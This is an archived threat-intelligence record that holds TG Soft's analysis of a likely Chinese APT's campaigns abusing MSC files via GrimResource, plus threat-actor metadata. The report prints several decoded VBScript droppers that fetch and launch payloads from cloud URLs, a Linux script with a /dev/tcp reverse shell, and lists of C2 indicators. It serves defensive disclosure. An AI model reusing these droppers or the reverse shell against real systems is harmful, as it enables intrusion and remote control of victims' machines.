{ "id": "cede49a0-3ff9-43a7-bf94-11735f7594e6", "created_at": "2026-04-06T00:11:33.231593Z", "updated_at": "2026-04-10T03:37:40.643237Z", "deleted_at": null, "sha1_hash": "e118eb30b00875b6add60fa0a135488113bfc367", "title": "Chinese APT abuses MSC files with GrimResource vulnerability", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4572023, "plain_text": "Chinese APT abuses MSC files with GrimResource vulnerability\r\nBy TG Soft S.r.l. - https://www.tgsoft.it\r\nArchived: 2026-04-05 13:04:23 UTC\r\nOver the past few months, TG Soft's C.R.A.M. has been monitoring different threat actors abusing MSC files.\r\nThe first APT group to use .MSC files in their attacks was #Kimsuky in April 2024, as reported by company\r\nGenians. In May 2024, the use of this technique was also observed by the APT group known as #MustangPanda,\r\nwhich carries the #PlugX malware as reported by NTT.\r\nIn June 2024, the abuse of .MSC files was detected with the vulnerability called #GrimResource as reported by\r\nElastic.\r\nTG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware\r\ncampaigns carried out by an unknown cyber-actor that is most likely of Chinese origin to target Southeast Asia.\r\nBelow is the timeline of the monitored attacks:\r\nThe first campaign we analyzed is that of August 2, 2024.\r\n[upd 2024-08-26 -\u003e The timeline has been updated: the campaign identified on 2024/08/23 was delivered on\r\n2024/08/19]\r\n[upd 2024-09-16 -\u003e The timeline has been updated: added the campaign of 2024/09/14]\r\nCampaign Analysis\r\nCampaign of August 2, 2024\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 1 of 26\n\nOn August 2, 2024, an email campaign was released with the following file attached: 水域污染詳細訊息.msc\r\nTranslating the file name from Chinese to english, the document refers to: Detailed information on water\r\npollution.msc\r\nThe image of the infection chain is shown in the figure:\r\nThe MSC file via the vulnerability known as GrimResource automatically executes the following script:\r\nDecripting it gives the following more readable script:\r\nOption Explicit\r\nDim objShell, objFSO, objHTTP\r\nDim strURL1, strURL2, strURL3, strShowfileURL\r\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\r\nDim strExecutablePath\r\nstrURL1 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe\"\r\nstrURL2 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config\"\r\nstrURL3 = \"https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt\"\r\nstrShowfileURL = \"https[:]//wordpresss-data[.]s3.me-south-1[.]amazonaws[.]com/ws.pdf\"\r\nstrDownloadPath1 = \"C:\\Users\\Public\\oncesvc.exe\"\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 2 of 26\n\nstrDownloadPath2 = \"C:\\Users\\Public\\oncesvc.exe.config\"\r\nstrDownloadPath3 = \"C:\\Users\\Public\\water.txt\"\r\nstrShowfilePath = \"C:\\Users\\Public\\wrasb.pdf\"\r\nstrExecutablePath = \"C:\\Users\\Public\\oncesvc.exe\"\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nIf Not objFSO.FileExists(strDownloadPath1) Then\r\n    DownloadFile strURL1, strDownloadPath1\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath2) Then\r\n    DownloadFile strURL2, strDownloadPath2\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath3) Then\r\n    DownloadFile strURL3, strDownloadPath3\r\nEnd If\r\nIf Not objFSO.FileExists(strShowfilePath) Then\r\n    DownloadFile strShowfileURL, strShowfilePath\r\nEnd If\r\nobjShell.Run strExecutablePath, 1, True\r\nobjShell.Run strShowfilePath, 1, True\r\nSub DownloadFile(url, path)\r\n    Dim objStream\r\n    Set objStream = CreateObject(\"ADODB.Stream\")\r\n    objHTTP.Open \"GET\", url, False\r\n    objHTTP.Send\r\n    If objHTTP.Status = 200 Then\r\n        objStream.Open\r\n        objStream.Type = 1 ' adTypeBinary\r\n        objStream.Write objHTTP.ResponseBody\r\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\r\n        objStream.Close\r\n    End If\r\n    Set objStream = Nothing\r\nEnd Sub\r\nThe script downloads the following files into the C:\\Users\\Public folder:\r\noncesvc.exe (Microsoft legitimate file \"ClickOnce\")\r\noncesvc.exe.config (Configuration file to load malicious DLL)\r\nwater.txt (Unused file, probably to track infection)\r\nws.pdf (Decoy)\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 3 of 26\n\nBelow we see the images of the decoy PDF file:\nThe oncesvc.exe.config file contains the following configuration:\nwhich allows to load the malicious DLL from the address https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg through the App Domain Manager Injection technique.\nThe malicious DLL that is executed by the ONCESVC.EXE process, download from the site\nhttps[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111522.jpeg a completely diskless 64-bit shellcode.\nIn the figure we can see the decryption of the obfuscated URL with AES and the execution of the downloaded\nshellcode thread:\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\nPage 4 of 26\n\nThe shellocode uses a custom DBJ2 algorithm to determine the hash of the API names to use, as we see in the\r\nfigure:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 5 of 26\n\nThe 64bit shellcode connects to domain status[.]s3cloud-azure[.]com on the port 8080 at the page:\r\n/common/oauth2/authorize?client_id=\u003cID del cliente\u003e\r\nby sending the following request via post: {\"user\":\"password\"}\r\nThe following information is sent in base 64 in the client_id field:\r\nusername with an indication of whether it is Administrator (isAdmin)\r\nPC name\r\nprocess name\r\nindication of the architecture of the operating system (32 or 64 bit)\r\nsystem memory\r\nThen the shellcode calls the following page: /api/v1/homepage/\u003cid\u003e\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 6 of 26\n\nIf the answer you get is different from:\r\nNULL\r\n404 Not Found!\r\nthen a new shellcode is executed as we see in the figure:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 7 of 26\n\nDuring the analysis the shellcode downloaded and executed a third stage containing the Marte Beacon with\r\nCobaltStrike which connected to the site: static[.]trendmicrotech[.]com with 8443 port (ipv6:\r\n2a06:98c1:3120:0:0:0:0:7) at the pages:\r\nGET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts.\r\nPOST /OneCollector/1.0\r\nThis version of CobaltStrike created the following pipe: \\\\.\\pipe\\srvsvc-1-5-5-067b62\r\nThe August 2 campaign targeted the Taiwan government as reported by StrikeReady_Labs\r\nCampaign of July 16, 2024\r\nOn July 16, 2024, the file Cert.msc was uploaded to Virus Total from Vietnam .\r\nIt is assumed that this is the first campaign used by the threat actor exploiting the grim resource technique.\r\nThe MSC file contains an obfuscated script from which the following is obtained:\r\nOption Explicit\r\nDim objShell, objFSO, objHTTP\r\nDim strURL1, strURL2\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 8 of 26\n\nDim strDownloadPath1, strDownloadPath2\r\nDim strExecutablePath\r\nstrURL1 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe\"\r\nstrURL2 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config\"\r\nstrDownloadPath1 = \"C:\\Users\\Public\\Music\\Cert.exe\"\r\nstrDownloadPath2 = \"C:\\Users\\Public\\Music\\Cert.exe.config\"\r\nstrExecutablePath = \"C:\\Users\\Public\\Music\\Cert.exe\"\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nIf Not objFSO.FileExists(strDownloadPath1) Then\r\n    DownloadFile strURL1, strDownloadPath1\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath2) Then\r\n    DownloadFile strURL2, strDownloadPath2\r\nEnd If\r\nobjShell.Run strExecutablePath, 1, True\r\nSub DownloadFile(url, path)\r\n    Dim objStream\r\n    Set objStream = CreateObject(\"ADODB.Stream\")\r\n    objHTTP.Open \"GET\", url, False\r\n    objHTTP.Send\r\n    If objHTTP.Status = 200 Then\r\n        objStream.Open\r\n        objStream.Type = 1 ' adTypeBinary\r\n        objStream.Write objHTTP.ResponseBody\r\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\r\n        objStream.Close\r\n    End If\r\n    Set objStream = Nothing\r\nEnd Sub\r\nThe script inside the MSC file downloads the following files:\r\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config\r\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe\r\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json\r\nhttps[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg\r\nThe following files were not available during the analysis:\r\nCert.exe\r\nServiceHub.json\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 9 of 26\n\nThe Cert.exe file should have been the ServiceHub.Host.netfx.x64.exe program.\nThe Cert.exe.config file contains the following configuration:\nIt is assumed that the ServiceHub.json file is the malicious DLL that is loaded through the App Domain Manager\nInjection technique and the 205fcab1ea04882.jpg file instead directly contains the Marte Beacon with\nCobaltStrike that connected to the site: us2[.]s3bucket-azure[.]online (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the\npage \"/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts\"\nThe July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly\nexecuted the Marte Beacon with Cobalt Strike, as shown in the figure.:\nCampaign of August 12, 2024\nOn August 12, 2024, the file Document_new.pdf.msc was uploaded to Virus Total from Vietnam.\nThe MSC file contains an obfuscated script from which the following is obtained:\nOption Explicit\nDim objShell, objFSO, objHTTP\nDim strURL1, strURL2, strURL3, strShowfileURL\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\nDim strExecutablePath\nstrURL1 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json\"\nstrURL2 = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config\"\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\nPage 10 of 26\n\nstrURL3 = \"https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe\"\r\nstrShowfileURL = \"https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf\"\r\nstrDownloadPath1 = \"C:\\Windows\\Temp\\Service.exe\"\r\nstrDownloadPath2 = \"C:\\Windows\\Temp\\Service.exe.config\"\r\nstrDownloadPath3 = \"C:\\Users\\Public\\win.ini\"\r\nstrShowfilePath = \"C:\\Users\\Public\\Documents\\Documents.pdf\"\r\nstrExecutablePath = \"C:\\Windows\\Temp\\Service.exe\"\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nIf Not objFSO.FileExists(strDownloadPath1) Then\r\n    DownloadFile strURL1, strDownloadPath1\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath2) Then\r\n    DownloadFile strURL2, strDownloadPath2\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath3) Then\r\n    DownloadFile strURL3, strDownloadPath3\r\nEnd If\r\nIf Not objFSO.FileExists(strShowfilePath) Then\r\n    DownloadFile strShowfileURL, strShowfilePath\r\nEnd If\r\nobjShell.Run strExecutablePath, 1, False\r\nobjShell.Run strShowfilePath, 1, False\r\nSub DownloadFile(url, path)\r\n    Dim objStream\r\n    Set objStream = CreateObject(\"ADODB.Stream\")\r\n    objHTTP.Open \"GET\", url, False\r\n    objHTTP.Send\r\n    If objHTTP.Status = 200 Then\r\n        objStream.Open\r\n        objStream.Type = 1 ' adTypeBinary\r\n        objStream.Write objHTTP.ResponseBody\r\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\r\n        objStream.Close\r\n    End If\r\n    Set objStream = Nothing\r\nEnd Sub\r\nThe only component we had access to was the calc.exe file, which was stored inside the public folder under the\r\nname win.ini.\r\nDuring the analysis, it was not possible to recover most of the files used in the attack..\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 11 of 26\n\nCampaign of August 15, 2024\r\nOn August 15, 2024, the file readme(解压密码).msc was uploaded to Virus Total\r\nThe MSC file contains an obfuscated script from which the following output is obtained:\r\nOption Explicit\r\nDim objShell, objFSO, objHTTP\r\nDim strURL1, strURL2, strURL3, strShowfileURL\r\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\r\nDim strExecutablePath\r\nstrURL1 = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe\"\r\nstrURL2 = \"https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll\"\r\nstrURL3 = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config\"\r\nstrShowfileURL = \"https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx\"\r\nstrDownloadPath1 = \"C:\\Users\\Public\\oncesvc.exe\"\r\nstrDownloadPath2 = \"C:\\Users\\Public\\msedge.dll\"\r\nstrDownloadPath3 = \"C:\\Users\\Public\\oncesvc.exe.config\"\r\nstrShowfilePath = \"C:\\Users\\Public\\readme.docx\"\r\nstrExecutablePath = \"C:\\Users\\Public\\oncesvc.exe\"\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nIf Not objFSO.FileExists(strDownloadPath1) Then\r\n    DownloadFile strURL1, strDownloadPath1\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath2) Then\r\n    DownloadFile strURL2, strDownloadPath2\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath3) Then\r\n    DownloadFile strURL3, strDownloadPath3\r\nEnd If\r\nIf Not objFSO.FileExists(strShowfilePath) Then\r\n    DownloadFile strShowfileURL, strShowfilePath\r\nEnd If\r\nobjShell.Run strExecutablePath, 1, True\r\nobjShell.Run strShowfilePath, 1, True\r\nSub DownloadFile(url, path)\r\n    Dim objStream\r\n    Set objStream = CreateObject(\"ADODB.Stream\")\r\n    objHTTP.Open \"GET\", url, False\r\n    objHTTP.Send\r\n    If objHTTP.Status = 200 Then\r\n        objStream.Open\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 12 of 26\n\nobjStream.Type = 1 ' adTypeBinary\r\n        objStream.Write objHTTP.ResponseBody\r\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\r\n        objStream.Close\r\n    End If\r\n    Set objStream = Nothing\r\nEnd Sub\r\nThis campaign is similar to the one on August 2nd, where the oncesvc.exe file is used to load the malicious DLL\r\ndownloaded from: https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.\r\nMalicious DLL downloads 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.\r\nThe 64-bit shellcode is similar to the one seen on August 2nd, the command and control server in this case is\r\napi[.]s2cloud-amazon[.]com.\r\nThe post used in this case is: {\"user\":\"password1\"}, slightly different than the August 2 campaign.\r\nAgain the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version\r\nseen in the August 2 campaign..\r\nCampaign of August 20, 2024\r\nOn August 20, 2024, the file \"Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm\r\n2024.msc\" was uploaded to Virus Total.\r\nThe campaign targets Vietnam, translating the file name from Vietnamese would be \"Instructions and\r\nrequirements for inspection and supervision of the activities of each unit in 2024.msc\"\r\nThe MSC file is similar to those seen in previous campaigns, the ONCESVC.EXE file is replaced with\r\nMUSICV.EXE.\r\nThe configuration file is the same as seen in the August 15 campaign, the same 64-bit shellcode is downloaded\r\nand the same Marte Beacon with Cobalt Strike.\r\nInteresting is the decoy displayed on theme \"Vietnam Oil and Gas\":\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 13 of 26\n\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 14 of 26\n\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 15 of 26\n\nCampaign of August 19, 2024\r\nOn August 23, 2024, the file \"贵州电视台张青副台长腐败内部视频证据.msc\" was uploaded to Virus Total.\r\nThe campaign may be targeting France and was delivered on August 19, 2024, as the file name translated from\r\nChinese would be \"Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV\r\nStation.msc\".\r\nThe MSC file is similar to the one seen in the previous campaign on August 20, where the MUSICV.EXE program\r\nis used.\r\nDuring the analysis, it was not possible to download the malicious DLL from the link https://speedshare.oss-cn-hongkong.aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json. The link is the same as the campaign of\r\nAugust 20th.\r\nThe MSC file contains an obfuscated script from which the following output is obtained:\r\nOption Explicit\r\nDim objShell, objFSO, objHTTP\r\nDim strURL1, strURL2, strURL3, strShowfileURL\r\nDim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath\r\nDim strExecutablePath\r\nstrURL1 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe\"\r\nstrURL2 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config\"\r\nstrURL3 = \"https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt\"\r\nstrShowfileURL = \"http[:]//152[.]42[.]226[.]161/stime/1x.mp4\"\r\nstrDownloadPath1 = \"C:\\Users\\Public\\Music\\musicx.exe\"\r\nstrDownloadPath2 = \"C:\\Users\\Public\\Music\\musicx.exe.config\"\r\nstrDownloadPath3 = \"C:\\Users\\Public\\Music\\music.txt\"\r\nstrShowfilePath = \"C:\\Users\\Public\\proton.mp4\"\r\nstrExecutablePath = \"C:\\Users\\Public\\Music\\musicx.exe\"\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\r\nSet objHTTP = CreateObject(\"MSXML2.XMLHTTP\")\r\nIf Not objFSO.FileExists(strDownloadPath1) Then\r\n    DownloadFile strURL1, strDownloadPath1\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath2) Then\r\n    DownloadFile strURL2, strDownloadPath2\r\nEnd If\r\nIf Not objFSO.FileExists(strDownloadPath3) Then\r\n    DownloadFile strURL3, strDownloadPath3\r\nEnd If\r\nIf Not objFSO.FileExists(strShowfilePath) Then\r\n    DownloadFile strShowfileURL, strShowfilePath\r\nEnd If\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 16 of 26\n\nobjShell.Run strExecutablePath, 1, False\r\nobjShell.Run strShowfilePath, 1, False\r\nSub DownloadFile(url, path)\r\n    Dim objStream\r\n    Set objStream = CreateObject(\"ADODB.Stream\")\r\n    objHTTP.Open \"GET\", url, False\r\n    objHTTP.Send\r\n    If objHTTP.Status = 200 Then\r\n        objStream.Open\r\n        objStream.Type = 1 ' adTypeBinary\r\n        objStream.Write objHTTP.ResponseBody\r\n        objStream.SaveToFile path, 2 ' adSaveCreateOverWrite\r\n        objStream.Close\r\n    End If\r\n    Set objStream = Nothing\r\nEnd Sub\r\nBelow we see some screenshots of the decoy video downloaded from http://152.42.226[.]161/stime/1x.mp4\r\nInside the ZIP file sent via email containing the file 贵州电视台张青副台长腐败内部视频证据.msc the file 贵\r\n州电视台内部领导张青副台长腐败内幕.docx is also present, which we see below:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 17 of 26\n\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 18 of 26\n\nOther campaigns in April and May 2024\r\nThe analysis of the third stage of the Marte Beacon with Cobalt Strike has allowed us to associate the threat actor\r\nwith three other campaigns launched between April and May:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 19 of 26\n\n27 aprile 2024 (Philippines)\r\n7 maggio 2024 (Philippines)\r\n17 maggio 2024 (Vietnam)\r\nThese campaigns did not abuse MSC files to be distributed.\r\nThe Marte Beacon with Cobalt Strike could be located from the following url:\r\nhttp://43.199.33[.]246:443/payload.bin\r\nAnalyzing the IP 43.199.33[.]246 The April 27 campaign was detected through the executable file named\r\nx1ffjiqd.exe, which downloaded and executed the following files:\r\nhttp://43.199.33[.]246:443/payload.bin\r\nhttp://43.199.33[.]246:443/example.pdf\r\nThe payload.bin file is the Marte Beacon with Cobalt Strike with C\u0026C server visualstudio-microsoft[.]com and\r\nport 443.\r\nThe following decoy was used in the April 27 campaign:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 20 of 26\n\nThe following decoy was used in the May 7 campaign:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 21 of 26\n\nIn the May 17 campaign the following decoy was used with the name example.docx:\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 22 of 26\n\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 23 of 26\n\nThe IP address 43.199.33[.]246 is also associated with an ELF file (Linux) that downloads a backdoor as we can\r\nsee from the code snippet below:\r\nwhoami \u003e /tmp/test\r\ncurl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond\r\nchmod 777 /tmp/google_usb_ssh\r\n/tmp/google_usb_ssh\r\nrm /tmp/google_usb_ssh\r\nbash -i \u003e\u0026 /dev/tcp/43[.]199[.]33[.]246/4433 0\u003e\u00261\r\nwget https[:]//download[.]chrorne[.]com/error.logs\r\ngedit error.logs /dev/null -c /bin/sh\r\nThe cybercriminal probably needed to hit a target with a Linux OS. This bash script is similar in behavior to the\r\nVisualBasic script used inside MSC files for Windows. In this case the decoy is the display of an email message\r\ncontained in the \"error.logs\" file.\r\n \r\nConclusions\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 24 of 26\n\nThe campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia. With\r\nparticular focus on the following countries: Philippines, Vietnam, and Taiwan.\r\nFrom August 2nd onwards, the threat actor inserted a new module into its infection chain containing a 64-bit\r\nshellcode which then leads to the execution of a third stage with the Marte and Cobalt Strike beacons.\r\nThe modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin, it has been noted that the\r\ngroup is operational from Monday to Friday in hours compatible with Chinese ones.\r\nAlthough it was not possible to make a precise attribution, it could be a subgroup of APT41.\r\nIOC\r\nfb640cfb9a86b9dc6806b048c6a88ef6ff546ca830a147322b4e3a3646b70942\r\neaae358c15ea26a976804a398c3fc2c25b37db0c89f09307e33cfc9ebcfba1d0\r\nebebe25dc22fecceb27c390ce77059ade8188be71e340a1e7b098cb3b73ba855\r\n4edc77c3586ccc255460f047bd337b2d09e2339e3b0b0c92d68cddedf2ac1e54\r\n04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e\r\nc78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc\r\n4887fdb5bd5a59fa1754415dd818d455567cf6fe65fbeb7fbdbbe5b018bc3713\r\n633f5b27245a92b38d114aef292a485650bda737785d8a186b43cba8dc3969ca\r\n1c13e6b1f57de9aa10441f63f076b7b6bd6e73d180e70e6148b3e551260e31ee\r\ne7c58c2e315be01bd3a279c134e471ccf28046f67604b901279594dc5269a0f1\r\nca05513c365c60a8fdabd9e21938796822ecda03909b3ee5f12eb82fefa34d84\r\nf1d519f43c36e24a89b351f00059a1bdb9afc2a339f7301117babb484e2cc555\r\n159d13989d0ae44fddb7b1d4c331f1040d187693f16daa138c651f2cc9b7f6d3\r\na0d662b1765301f38b17b861893d282005d821139524d583ec0cd4ccfc5cd43c\r\n8542ee752ef2ee498e106c0a6ddc4a9810320d14fd85a857520b19d02db46903\r\n1e6c661d6981c0fa56c011c29536e57d21545fd11205eddf9218269ddf53d448\r\n257fa5c998d2117cc38452e6cbd2bf17b507c98ee492b246de6dcbc784585263\r\n6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\r\n59171a541712e089dffee2336ec908aec856a38c4b7fbd74cc7a32fb698bc03e\r\n333ed1e77dd0ae502dd73ea029957cb015e770cabad3e090ab3db659769f86af\r\n9228d8ad3acec40e5d328f2b3ef4107fbe49107a85eb850c900b516520a1cb20\r\na725be0997035e10e059f8f3141a12f836aaca13e364cfa588ea548ec38d9498\r\nstatus[.]s3cloud-azure[.]com\r\nstatic[.]trendmicrotech[.]com:8443\r\napi[.]s2cloud-amazon[.]com:8080\r\nus2[.]s3bucket-azure[.]online:443\r\nvisualstudio-microsoft[.]com:443\r\n43[.]199[.]33[.]246:443\r\nAuthors: Ing. Gianfranco Tonello, Michele Zuin\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 25 of 26\n\nAny information published on our site may be used and published on other websites, blogs, forums, facebook\r\nand/or in any other form both in paper and electronic form as long as the source is always and in any case cited\r\nexplicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web\r\npage from which textual content, ideas and / or images have been extrapolated.\r\nIt will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of\r\nsummary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by\r\nTG Soft of which we point out the direct link to the original information: [direct clickable link]”\r\nSource: https://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nhttps://www.tgsoft.it/news/news_archivio.asp?id=1568\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.tgsoft.it/news/news_archivio.asp?id=1568" ], "report_names": [ "news_archivio.asp?id=1568" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", 